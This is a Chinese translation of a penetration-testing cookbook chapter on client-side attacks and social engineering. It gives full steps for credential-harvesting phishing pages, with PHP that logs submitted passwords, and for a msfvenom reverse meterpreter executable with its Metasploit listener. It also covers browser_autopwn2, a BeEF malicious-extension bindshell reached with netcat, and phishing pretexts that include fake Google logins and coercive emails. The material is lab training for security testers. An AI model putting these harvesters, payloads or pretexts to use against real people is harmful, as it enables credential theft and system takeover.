第九章 客戶端攻擊和社會(huì)工程

作者：Gilberto Najera-Gutierrez

譯者：飛龍

協(xié)議：CC BY-NC-SA 4.0

簡介

我們目前所見的大部分技巧都嘗試?yán)梅?wù)端的漏洞或設(shè)計(jì)缺陷，并訪問它來從數(shù)據(jù)庫中提取信息。有另外一種攻擊，使用服務(wù)器來利用用戶軟件上的漏洞，或者嘗試欺騙用戶來做一些他們通常情況下不會(huì)做的事情，以便獲得用戶擁有的信息。這些攻擊就叫做客戶端攻擊。

這一章中，我們會(huì)復(fù)查一些由攻擊者使用，用于從客戶端獲得信息的技巧，通過社會(huì)工程、欺騙或利用軟件漏洞。

雖然它并不和 Web 應(yīng)用滲透測試特定相關(guān)，我們會(huì)涉及它們，因?yàn)榇蠖鄶?shù)都是基于 web 的，并且都是非常常見的場景，其中我們在攻擊客戶端時(shí)，能夠訪問應(yīng)用和服務(wù)器。所以，了解攻擊者如何執(zhí)行這類攻擊，對于滲透測試者來說非常重要。

9.1 使用 SET 創(chuàng)建密碼收集器

社會(huì)工程攻擊可能被認(rèn)為是客戶端攻擊的特殊形式。在這種攻擊中，攻擊者需要說服用戶，相信攻擊者是可信任的副本，并且有權(quán)接收用戶擁有的一些信息。

SET 或社會(huì)工程工具包（(https://www.trustedsec.com/social-engineertoolkit/）是一套工具，為執(zhí)行針對人性的攻擊而設(shè)計(jì)。這類攻擊，包括網(wǎng)絡(luò)釣魚、郵件群發(fā)、SMS、偽造無線接入點(diǎn)、惡意網(wǎng)站、感染性媒體，以及其它。

這個(gè)秘籍中，我們會(huì)使用 SET 來創(chuàng)建密碼收集器網(wǎng)頁，并看看它如何工作，以及攻擊者如何使用它來盜取用戶密碼。

操作步驟

1. 在 root 終端中輸入下列命令：

   setoolkit
   

2. 在set>提示符中輸入1（Social-Engineering Attacks）并按下回車。

3. 現(xiàn)在選擇Website Attack Vectors（選項(xiàng)2）。

4. 從下面的菜單中，我們選擇Credential Harvester Attack Method（選項(xiàng)3）。

5. 選擇Site Cloner（選項(xiàng)2）。

6. 它會(huì)詢問IP address for the POST back in Harvester/Tabnabbing。它的意思是收集到的證書打算發(fā)送到哪個(gè) IP。這里，我們輸入 Kali 主機(jī)在vboxnet0中的 IP 192.168.56.1。

7. 下面，壓腳詢問要克隆的 URL，我們會(huì)從 vulnerable_vm 中克隆 Peruggia 的登錄表單。輸入http://192.168.56.102/peruggia/index. php?action=login。

8. 現(xiàn)在會(huì)開始克隆，之后你會(huì)被詢問是否 SET 要開啟 Apache 服務(wù)器，讓我們這次選擇Yes，輸入y并按下回車。

9. 再次按下回車。

10. 讓我們測試一下頁面，訪問http://192.168.56.1/。

    現(xiàn)在我們擁有原始登錄頁面的一份精確副本。

11. 現(xiàn)在在里面輸入一些用戶名和密碼，并點(diǎn)擊Login。我們要嘗試harvester/test。

12. 你會(huì)看到頁面重定向到了原始的登錄頁面?，F(xiàn)在，來到終端并輸入收集器文件保存的目錄，默認(rèn)為 Kali 中的/var/www/ html：

    cd /var/www/html
    

13. 這里應(yīng)該有名稱為harvester_{date and time}.txt的文件。

14. 顯示它的內(nèi)容，我們會(huì)看到所有捕獲的信息：

    cat harvester_2015-11-22 23:16:24.182192.txt
    

    這就結(jié)束了，我們僅僅需要將連接發(fā)送給我們的目標(biāo)，并讓他們訪問我們的偽造登錄頁面，來收集它們的密碼。

工作原理

SET 在克隆站點(diǎn)的時(shí)候會(huì)創(chuàng)建三個(gè)文件：首先是index.html，這是原始頁面的副本，并包含登錄表單。如果我們查看 SET 在我們的 Kali 中的 /var/www/html創(chuàng)建的index.html的代碼，我們會(huì)發(fā)現(xiàn)下面的代碼：

<form action="http://192.168.56.1/post.php" method=post> 
<br> 
Username: <input type=text name=username><br> 
Password: <input type=password name=password><br> 
<br><input type=submit value=Login><br> 
</form>

這里我們可以看到用戶名和密碼都發(fā)給了 192.168.56.1 （我們的 Kali 主機(jī)）的post.php，這是 SET 創(chuàng)建的第二個(gè)文件。這個(gè)文件所做的所有事情就是讀取 POST 請求的內(nèi)容并將它們寫入harvester_{date and time}.txt文件。 SET 所創(chuàng)建的第三個(gè)文件儲(chǔ)存由用戶提交的信息。在向文件中寫入數(shù)據(jù)之后，<meta>標(biāo)簽重定向到原始的登錄頁面，所以用戶會(huì)認(rèn)為他們輸入了一些不正確的用戶名或密碼：

<?php 
$file = 'harvester_2015-11-22 23:16:24.182192.txt'; 
file_put_contents($file, print_r($_POST, true), FILE_APPEND); 
?> 
<meta http-equiv="refresh" content="0; 
url=http://192.168.56.102/peruggia/index.php?action=login" 
/>

9.2 使用之前保存的頁面來創(chuàng)建釣魚網(wǎng)站

在之前的秘籍中，我們使用了 SET 來復(fù)制網(wǎng)站并使用它來收集密碼。喲時(shí)候，僅僅復(fù)制登錄頁面不會(huì)對高級用戶生效，在正確輸入密碼并再次重定向登錄頁面時(shí)，它們可能會(huì)產(chǎn)生懷疑，或者會(huì)試著瀏覽頁面中的其它鏈接。我們這樣就會(huì)失去它們，因?yàn)樗鼈儠?huì)離開我們的頁面而來到原始站點(diǎn)。

這個(gè)秘籍中，我們會(huì)使用我們在第三章“為 Wget 離線分析下載頁面”秘籍中復(fù)制的頁面，來構(gòu)建更加詳細(xì)的釣魚網(wǎng)站，因?yàn)樗鼛缀鹾兴袑?dǎo)航，并且會(huì)在捕獲證書之后登陸原始站點(diǎn)。

準(zhǔn)備

我們需要保存 Web 頁面，遵循第三章“為 Wget 離線分析下載頁面”秘籍。簡單來說，可以通過下列命令來完成：

wget -r -P bodgeit_offline/ http://192.168.56.102/bodgeit/ 

之后，離線頁面會(huì)儲(chǔ)存在bodgeit_offline目錄中。

操作步驟

1. 第一步是將下載的站點(diǎn)復(fù)制到 Kali 中 APache 的根目錄。在 root 終端中：

   cp -r bodgeit_offline/192.168.56.102/bodgeit /var/www/html/ 
   

2. 之后我們啟動(dòng) Apache 服務(wù)：

   service apache2 start 
   

3. 下面，我們需要更新我們的登錄頁面，使它重定向我們收集密碼的腳本。打開bodgeit目錄（/ var/www/html/bodgeit）中的login.jsp文件，并尋找下面的代碼：

   <h3>Login</h3> 
   Please enter your credentials: <br/><br/> 
   <form method="POST">
   

4. 現(xiàn)在，在表單標(biāo)簽中添加action來調(diào)用post.php：

   <form method="POST" action="post.php">
   

5. 我們需要在login.jsp的相同目錄下創(chuàng)建該文件，創(chuàng)建post.php，帶有下列代碼：

   <?php  
   $file = 'passwords_C00kb00k.txt';  
   file_put_contents($file, print_r($_POST, true), FILE_APPEND);  
   $username=$_POST["username"];  
   $password=$_POST["password"];  
   $submit="Login"; ?> 
   <body onload="frm1.submit.click()"> 
   <form name="frm1" id="frm1" method="POST" 
   action="http://192.168.56.102/bodgeit/login.jsp"> 
   <input type="hidden" value="<?php echo $username;?>" name ="username"> 
   <input type="hidden" value="<?php echo $password;?>" name ="password"> 
   <input type="submit" value="<?php echo $submit;?>" name ="submit"> 
   </form> 
   </body>
   

6. 你可以看到，密碼會(huì)保存到passwords_C00kb00k.txt。我們需要?jiǎng)?chuàng)建這個(gè)文件來設(shè)置合理的權(quán)限。在 root 終端中訪問/var/www/html/bodgeit，并輸入下列命令：

   touch passwords_C00kb00k.txt 
   chown www-data passwords_C00kb00k.txt
   

   要記住 Web 服務(wù)器運(yùn)行在 www-data 用戶下，所以我們需要使這個(gè)用戶為文件的所有者，便于它可被 web 服務(wù)器進(jìn)程寫入。

7. 現(xiàn)在，是時(shí)候讓受害者訪問這個(gè)站點(diǎn)了，假設(shè)我們讓用戶訪問了http://192.168.56.1/bodgeit/login.jsp，打開瀏覽器并訪問它。

8. 使用一些有效用戶信息填充登錄表單，對于這個(gè)秘籍我們會(huì)使用user@ mail.com/password。

9. 點(diǎn)擊Login。

   它看起來能正常工作，我們現(xiàn)在成功登錄了192.168.56.102。

10. 讓我們檢查密碼文件，在終端中輸入：

    cat passwords_C00kb00k.txt
    

    并且，我們得到它了。我們捕獲了用戶的密碼，將它們重定向到正常頁面并執(zhí)行了登錄。

工作原理

這個(gè)秘籍中，我們使用了站點(diǎn)副本來創(chuàng)建密碼收集器，并使它更加可信，我們是腳本執(zhí)行原始站點(diǎn)的登錄。

在前三步中，我們簡單設(shè)置了 Web 服務(wù)器和它要展示的文件。下面，我們創(chuàng)建了密碼收集器腳本post.php：前兩行和之前的秘籍相同，它接受所有 POST 參數(shù)并保存到文件中。

$file = 'passwords_C00kb00k.txt';  
file_put_contents($file, print_r($_POST, true), FILE_APPEND);

之后我們將每個(gè)參數(shù)儲(chǔ)存到變量中：

$username=$_POST["username"];  
$password=$_POST["password"];  
$submit="Login";

因?yàn)槲覀兊牡卿洸淮蛩阋蕾囉谟脩舭l(fā)送的正確值，我們設(shè)置$submit="Login"。下面，我們創(chuàng)建了 HTML 主題，它包含一個(gè)表單，在頁面加載完畢后會(huì)自動(dòng)發(fā)送username，password和submit值到原始站點(diǎn)。

<body onload="frm1.submit.click()"> 
<form name="frm1" id="frm1" method="POST" 
action="http://192.168.56.102/bodgeit/login.jsp"> 
<input type="hidden" value="<?php echo $username;?>" name ="username"> 
<input type="hidden" value="<?php echo $password;?>" name ="password"> 
<input type="submit" value="<?php echo $submit;?>" name ="submit"> 
</form> 
</body>

要注意，body中的onload事件并不調(diào)用frm1.submit()而是frm1.submit. click()。這是因?yàn)楫?dāng)我們使用submit作為表單元素的名稱時(shí)，表單中的submit()函數(shù)會(huì)被這個(gè)元素覆蓋掉（這里是提交按鈕）。我們并不打算修改按鈕名稱，因?yàn)樗窃颊军c(diǎn)需要的名稱。所以我們使submit變成一個(gè)按鈕，而不是隱藏字段，并使用它的click函數(shù)將值提交到原始站點(diǎn)。我們同時(shí)將表單中的字段值設(shè)置為我們之前用于儲(chǔ)存用戶數(shù)據(jù)的變量值。

9.3 使用 Metasploit 創(chuàng)建反向 shell 并捕獲連接

當(dāng)我們執(zhí)行客戶端攻擊的時(shí)候，我們能夠欺騙用戶來執(zhí)行程序，并使這些程序連接回控制端。

這個(gè)秘籍中，我們會(huì)了解如何使用 Metasploit 的 msfvenom 來創(chuàng)建可執(zhí)行程序（反向 meterpreter shell），它會(huì)在執(zhí)行時(shí)連接我們的 Kali 主機(jī)，并向我們提供用戶計(jì)算機(jī)的控制。

操作步驟

1. 首先，我們要?jiǎng)?chuàng)建我們的 shell。在 Kali 中打開終端并執(zhí)行下列命令：

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4443 -f exe > cute_dolphin.exe
   

   這會(huì)創(chuàng)建名為cute_dolphin.exe的文件，這是反向 meterpreter shell，反向意味著它會(huì)連接回我們，而不是監(jiān)聽我們的連接。

2. 下面，我們需要為我們“可愛的海豚”將要?jiǎng)?chuàng)建的連接建立監(jiān)聽器。在 MSFconsole 的終端中：

   use exploit/multi/handler 
   set payload windows/meterpreter/reverse_tcp 
   set lhost 192.168.56.1 set lport 4443 
   set ExitOnSession false 
   set AutorunScript post/windows/manage/smart_migrate 
   exploit -j -z 
   

   就像你看到的那樣，LHOST 和 RPORT 是我們用于創(chuàng)建exe文件的東西。這是程序?qū)⒁B接的 IP 地址和 TCP 端口。所以我們需要在這個(gè) Kali 的網(wǎng)絡(luò)接口和端口上監(jiān)聽。

3. 我們的 Kali 已準(zhǔn)備就緒，現(xiàn)在是準(zhǔn)備攻擊用戶的時(shí)候了，我們以 root 啟動(dòng) Apache 服務(wù)并運(yùn)行下列代碼：

   service apache2 start
   

4. 之后，將惡意文件復(fù)制到 web 服務(wù)器文件夾內(nèi)。

   cp cute_dolphin.exe /var/www/html/
   

5. 假設(shè)我們使用社會(huì)工程并使我們的受害者相信這個(gè)文件是需要執(zhí)行來獲得一些好處的東西。在 Windows 客戶端虛擬機(jī)內(nèi)，訪問http://192.168.56.1/cute_dolphin.exe。

6. 你會(huì)被詢問下載還是運(yùn)行這個(gè)文件，出于測試目的，選擇Run（運(yùn)行），再被詢問時(shí)，再次選擇Run。

7. 現(xiàn)在，在 Kali MSFCONSOLE 的終端中，你會(huì)看到建立好的連接：

8. 我們在后臺運(yùn)行連接處理器（-j -z選項(xiàng)）。讓我們檢查我們的活動(dòng)會(huì)話：

   sessions
   

9. 如果我們打算和會(huì)話交互，可以使用-i選項(xiàng)，帶有會(huì)話的編號：

   sessions -i 1 
   

10. 我們會(huì)看到 meterpreter 的提示符?，F(xiàn)在，我們可以請求被入侵系統(tǒng)的信息。

    sysinfo
    

11. 或者執(zhí)行系統(tǒng) shell。

    shell
    

工作原理

Msfvenom 幫助的我們從 Metasploit 大量列表中創(chuàng)建載荷，并且將它們集成到許多語言的源代碼中，或者創(chuàng)建腳本和可執(zhí)行文件。就像我們在這個(gè)秘籍所做的那樣。我們這里所使用的參數(shù)是所使用的載荷（windows/ meterpreter/reverse_tcp）、連接回來所需的主機(jī)和端口（LHOST 和 RPORT），以及輸出格式（-f exe）。將標(biāo)準(zhǔn)輸出重定向到文件來將它保存為cute_dolphin.exe。

Metasploit 的 exploit/multi/handler 是個(gè)載荷處理器，這里我們將其用于監(jiān)聽連接。在連接建立之后，它執(zhí)行了 meterpreter 載荷。

Meterpreter 是增強(qiáng)型的 Metasploit shell。它包含用于嗅探受害者網(wǎng)絡(luò)，用于將其作為入口來訪問本地網(wǎng)絡(luò)，或者用于執(zhí)行權(quán)限提升和密碼提取的模塊，以及其它滲透測試中的實(shí)用工具。

9.4 使用 Metasploit 的 browser_autpwn2 攻擊客戶端

Metasploit 框架包含客戶端利用的龐大集合，許多都為利用瀏覽器中的已知漏洞而設(shè)計(jì)。其中有一個(gè)模塊能夠檢測客戶端所使用的瀏覽器版本，并挑選最好的利用工具來觸發(fā)漏洞。這個(gè)模塊是 browser_autpwn 和 browser_autpwn2，后者是最新版本。

在這個(gè)秘籍中，我們會(huì)使用 browser_autpwn2 執(zhí)行攻擊，并將其配置好來讓目標(biāo)訪問。

操作步驟

1. 啟動(dòng) MSFCONSOLE。

2. 我們會(huì)使用 browser_autpwn2 （BAP2）。

   use auxiliary/server/browser_autopwn2 
   

3. 讓我們看一看它擁有什么配置項(xiàng)。

   show options
   

4. 我們將 Kali 設(shè)為接受連接的主機(jī)。

   set SRVHOST 192.168.56.1
   

5. 之后，我們?yōu)榻邮茼憫?yīng)的服務(wù)器創(chuàng)建目錄/kittens。

   set URIPATH /kittens
   

6. 這個(gè)模塊會(huì)觸發(fā)大量利用，包含一些 Android 上的。假設(shè)我們的攻擊目標(biāo)是 PC，并不打算依賴于 Adobe Flash 的授權(quán)。我們會(huì)排除 Android 和 Flash 的利用。

   set EXCLUDE_PATTERN android|adobe_flash
   

7. 我們也可以設(shè)置模塊的高級選項(xiàng)（使用show advanced來查看高級選項(xiàng)的完整列表），來向我們展示每個(gè)加載的利用的獨(dú)立路徑，并且更加詳細(xì)。

   set ShowExploitList true 
   set VERBOSE true
   

   高級選項(xiàng)也允許我們?yōu)槊總€(gè)平臺（Windows、Unix 和 Android）選擇載荷和它的參數(shù)，例如 LHOST 和 RPORT。

8. 現(xiàn)在，我們已經(jīng)為執(zhí)行利用做好了準(zhǔn)備。

   run
   

   如果我們打算觸發(fā)特定的利用，我們可以在服務(wù)器的 URL 后面使用Path值。例如，如果我們打算觸發(fā)firefox_svg_plugin，我們將http://192.168.56.1/PWrmfJApkwWsf發(fā)送給受害者，路徑在每次模塊運(yùn)行時(shí)會(huì)隨機(jī)生成。

9. 在客戶端的瀏覽器中，如果我們訪問http://192.168.56.1/kittens，我們會(huì)看到 BAP2 立即響應(yīng)，并且嘗試所有合適的利用，當(dāng)它成功執(zhí)行某個(gè)之后，它會(huì)在后臺創(chuàng)建會(huì)話：

工作原理

Browser Autopwn 會(huì)建立帶有主頁的 Web 服務(wù)器，并使用 JavaScript 來識別客戶端運(yùn)行了什么軟件，并基于它選擇合適的利用來嘗試。

這個(gè)秘籍中，我們設(shè)置了 Kali 主機(jī)，使其為kittens目錄的請求監(jiān)聽 8080 端口。我們所配置的其它請求是：

• EXCLUDE_PATTERN：告訴 BAP2 排除（不加載） Android 瀏覽器或 Flash 插件的利用。

• ShowExploitList：展示 BAP2 運(yùn)行時(shí)已加載的利用。

• VERBOSE：告訴 BPA2 顯示更多信息，關(guān)于加載了什么，加載到哪里，每一步都發(fā)生了什么。

之后，我們只需要運(yùn)行模塊并使一些用戶訪問我們的/kittens站點(diǎn)。

9.5 使用 BeEF 攻擊

在之前的章節(jié)中，我們看到了 BeEF（瀏覽器利用框架）能夠做什么。這個(gè)秘籍中，我們會(huì)使用它來發(fā)送而已瀏覽器擴(kuò)展，當(dāng)它執(zhí)行時(shí)，會(huì)向我們提供綁定到系統(tǒng)的遠(yuǎn)程 shell。

準(zhǔn)備

我們需要為這個(gè)秘籍在 Windows 客戶端安裝 Firefox。

操作步驟

1. 開啟 BeEF 服務(wù)。在 root 終端下，輸入下列命令：

   cd /usr/share/beef-xss/ 
   ./beef
   

2. 我們會(huì)使用 BeEF 的高級演示頁面來勾住我們的客戶端。在 Windows 客戶端 VM 中，打開 FIrefox 并瀏覽http://192.168.56.1:3000/demos/butcher/index.html。

3. 現(xiàn)在，登錄 BeEF 的面板（http://127.0.0.1:3000/ui/panel）。我們必須在這里查看新勾住的瀏覽器。

4. 選項(xiàng)被勾住的 FIrefox 并訪問Current Browser | Commands | Social Engineering | Firefox Extension (Bindshell)。

   由于它被標(biāo)為橙色（命令模塊對目標(biāo)工作，但是可能對用戶可見），我們可能需要利用社會(huì)工程來使用戶接受擴(kuò)展。

5. 我們需要發(fā)送叫做HTML5 Rendering Enhancements的擴(kuò)展給用戶，它會(huì)通過 1337 端口打開 shell。點(diǎn)擊Execute來加載攻擊。

6. 在客戶端，F(xiàn)irefox 會(huì)詢問許可來安裝插件并接受它。

7. 之后，如果 Windows 防火墻打開了，它會(huì)詢問許可來讓插件訪問網(wǎng)絡(luò)，選擇Allow access。

   最后兩個(gè)步驟高度依賴于社會(huì)工程，說服用戶信任這個(gè)插件值得安裝和授權(quán)。

8. 現(xiàn)在，我們應(yīng)該擁有了等待連接 1337 端口的的客戶端。在 Kali 中打開終端并連接到它（我們這里是 192.168.56.102）。

   nc 192.168.56.102 1337
   

   現(xiàn)在我們就連接到了客戶端并能夠在里面執(zhí)行命令。

工作原理

一旦客戶端被 BeEF 勾住，它就會(huì)像瀏覽器發(fā)送請求（通過hook.js）來下載擴(kuò)展。一旦下載完成，就取決于用戶是否安裝。

像之前所說的那樣，這個(gè)攻擊高度依賴用戶來完成關(guān)鍵步驟，這取決于我們通過社會(huì)工程手段說服用戶，使之相信必須安裝擴(kuò)展。這可以通過頁面上的文本來完成，比如說解鎖一些瀏覽器的實(shí)用功能非常必要。

在用戶安裝擴(kuò)展之后，我們只需要使用 Netcat 來連接端口 1337，并開始執(zhí)行命令。

9.6 誘使用戶訪問我們的仿造站點(diǎn)

每次社會(huì)工程攻擊的成功依賴于攻擊者說服用戶的能力，以及用戶遵循攻擊者指令的意愿。這個(gè)秘籍是一系列攻擊者所使用的情景和技巧，用于利用它們的優(yōu)勢使用戶更加信任并抓住它們。

這一節(jié)中，我們會(huì)看到一些在前面那些安全評估中能夠生效的攻擊。它們針對擁有一定等級的安全意識，并且不會(huì)陷入“銀行賬戶更新”騙局的用戶。

1. 做你自己的作業(yè)：如果是個(gè)釣魚攻擊，做一次關(guān)于目標(biāo)的徹底調(diào)查：社會(huì)網(wǎng)絡(luò)、論壇、博客、以及任何能夠告訴你目標(biāo)信息的信息員。Maltego 包含在 Kali 中，可能是用于這個(gè)任務(wù)的最佳工具。之后基于這些編造一個(gè)借口（偽造的故事）或者一個(gè)攻擊主題。

   我們發(fā)現(xiàn)了一些客戶的雇員，他們在 Facebook 主頁上發(fā)送大量圖片、視頻和文本。我們從她的頁面上收集了一些內(nèi)容并構(gòu)建了幻燈片演示，它也包含客戶電腦的遠(yuǎn)程執(zhí)行利用，我們將它通過郵件發(fā)送她。

2. 創(chuàng)建爭論：如果目標(biāo)是個(gè)某領(lǐng)域中的意見領(lǐng)袖，使用他自己的名言，使它們對你說的東西感興趣，這也會(huì)有幫助。

   我們被雇傭來執(zhí)行某個(gè)金融公司的滲透測試，協(xié)約條款包括了社會(huì)工程。我們的目標(biāo)是個(gè)經(jīng)濟(jì)和金融圈內(nèi)的知名人士。他在知名的雜志上撰稿，做講座，出現(xiàn)在經(jīng)濟(jì)新聞上，以及其它。我們的團(tuán)隊(duì)做了一些關(guān)于他的研究，并從經(jīng)濟(jì)雜志的網(wǎng)站上獲得了一篇文章。這篇文章包含他的公司（我們的客戶）的電子郵件。我們尋找了關(guān)于文章的更多信息，并發(fā)現(xiàn)其它站點(diǎn)上的一些評論和引用。我們利用這些杜撰了一個(gè)電子郵件，說我們有一些關(guān)于文章的評論，在消息中給出摘要，并使用短鏈接來鏈接到 Google Drive 的一個(gè)文檔上。

   短鏈接讓用戶訪問偽造的 Google 登錄頁面，它由我們控制，并允許我們獲取他同事的郵件和密碼。

3. 說出你是誰：好吧，這并不準(zhǔn)確。如果你說“我是個(gè)安全研究員，在你的系統(tǒng)中發(fā)現(xiàn)了一些東西”，可能對于開發(fā)者和系統(tǒng)管理員是個(gè)很好的鉤子。

   在其它場景中，我們需要明確公司中的社會(huì)工程師和系統(tǒng)管理員。首先，我們不能在網(wǎng)上發(fā)現(xiàn)任何關(guān)于他的有用信息，但是可以在公司的網(wǎng)站上發(fā)現(xiàn)一些漏洞。我們使用它來向我們的目標(biāo)發(fā)送郵件，并說我們在公司的服務(wù)器上發(fā)現(xiàn)了一些重要的漏洞，我們可以幫你修復(fù)它們，附上一張圖作為證據(jù)，以及Google Drive 文檔的鏈接（另一個(gè)偽造登錄頁面）。

4. 固執(zhí)與逼迫：有時(shí)候你不會(huì)在首次嘗試的時(shí)候就收到答復(fù)，這時(shí)總是要分析結(jié)果 -- 目標(biāo)是否點(diǎn)擊了鏈接，目標(biāo)是否提交了偽造信息，以及判斷是否要做出第二次嘗試。

   我們沒有從系統(tǒng)管理員那里收到該場景的答復(fù)，頁面也沒有人瀏覽。所以我們發(fā)送第二個(gè)郵件，帶有 PDF “完整報(bào)告”，并說如果我們沒有收到答復(fù)，就公布漏洞。于是我們收到了答復(fù)。

5. 使你自己更加可信：嘗試接受一些你模仿的人的修辭，并提供一些真實(shí)信息。如果你向公司發(fā)送郵件，使用公司的 Logo，為你的偽造站點(diǎn)獲得一個(gè)免費(fèi)的.tk或.co.nf域名，花費(fèi)一些時(shí)間來設(shè)計(jì)或正確復(fù)制目標(biāo)站點(diǎn)，以及其它。

   盜取信用卡數(shù)據(jù)的人所使用的技巧非常通用，它們使用信用卡號碼的一部分，后面帶有星號，發(fā)送“你需要更新你的信息”郵件（的變體）。

   正常信息會(huì)這樣寫：“你的信用卡 **** **** **** 3241 的信息”，但是偽造信息會(huì)這樣寫：“你的信用卡 4916 **** **** **** 的信息”。要知道前四位（4916）是 Visa 信用卡的標(biāo)準(zhǔn)。

工作原理

讓一個(gè)人打開來自完全陌生的人的郵件，閱讀它，并點(diǎn)擊它包含的鏈接，以及提供頁面上的所需信息，在尼日利亞王子詐騙橫行的今天，可能是一件非常困難的事情。成功社會(huì)工程攻擊的關(guān)鍵是創(chuàng)造一種感覺，讓受害者覺得攻擊者在為它做一些好事或必要的事情，也要?jiǎng)?chuàng)造一種急迫感，即用戶必須快速回復(fù)否則會(huì)丟失重要的機(jī)會(huì)。

更多

客戶端攻擊也可以用于被入侵服務(wù)器上的提權(quán)。如果你獲得了服務(wù)器的訪問，但是沒有繼續(xù)行動(dòng)的空間，你可能需要在你的攻擊主機(jī)上開啟而已服務(wù)器，并在目標(biāo)上瀏覽它。所以你可以利用其它類型的漏洞，并執(zhí)行特權(quán)命令。